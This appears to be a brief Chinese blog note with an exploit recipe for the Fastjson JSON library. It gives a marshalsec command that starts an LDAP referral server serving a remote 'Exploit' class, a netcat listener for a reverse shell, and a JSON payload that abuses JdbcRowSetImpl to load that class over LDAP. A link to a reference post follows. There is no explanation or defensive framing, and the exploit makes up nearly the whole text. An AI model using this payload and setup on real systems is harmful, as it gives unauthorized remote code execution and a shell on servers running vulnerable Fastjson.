java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://ip/#Exploit 9999
nc -lvp 1888
{
"name":{
"@type":"java.lang.Class",
"val":"com.sun.rowset.JdbcRowSetImpl"
},
"x":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"ldap://ip:9999/Exploit",
"autoCommit":true
}
}
参考博客:
https://mp.weixin.qq.com/s?__biz=MzA4NzUwMzc3NQ==&mid=2247483976&idx=1&sn=a0df1c42bc10fc61d311e22ae77f540e&chksm=903924b8a74eadaea92bad507f0d377019d0e3e3497d72b5c071fdd0f53c1dcb51c4c9664a71&mpshare=1&scene=23&srcid=&sharer_sharetime=1573711635444&sharer_shareid=b44dfff0f4fcebde34a1c3ecb5020139#rd
网友评论